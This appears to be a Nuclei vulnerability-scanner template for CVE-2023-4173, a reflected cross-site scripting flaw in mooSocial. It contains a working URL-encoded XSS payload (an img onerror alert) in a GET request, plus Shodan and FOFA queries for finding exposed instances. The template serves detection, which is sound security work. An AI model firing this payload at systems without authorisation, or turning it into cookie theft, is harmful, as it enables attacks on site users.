nuclei-templates/http/cves/2023/CVE-2023-4173.yaml

61 lines
2.1 KiB
YAML

id: CVE-2023-4173
info:
name: mooSocial 3.1.8 - Reflected XSS
author: momika233
severity: medium
description: |
A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest patch or upgrade to a newer version of mooSocial to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/51670
- https://nvd.nist.gov/vuln/detail/CVE-2023-4173
- http://packetstormsecurity.com/files/174016/mooSocial-3.1.8-Cross-Site-Scripting.html
- https://vuldb.com/?ctiid.236208
- https://vuldb.com/?id.236208
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-4173
cwe-id: CWE-79
epss-score: 0.00189
epss-percentile: 0.56249
cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: moosocial
product: moostore
shodan-query: http.favicon.hash:"702863115"
fofa-query:
- mooSocial
- moosocial
- icon_hash="702863115"
tags: cve2023,cve,packetstorm,moosocial,xss
http:
- method: GET
path:
- "{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=a onerror=alert('document.domain')>"
- "mooSocial"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 404
# digest: 490a00463044022000a0cc69486d6d9cbda953429f12b560b53462ee713d9e032f548c492903087c022046613a2e9d8e8ce1405dcf3366c8f551d340a96f7c337ed0c3495273864b492e:922c64590222798bb761d5b6d8e72950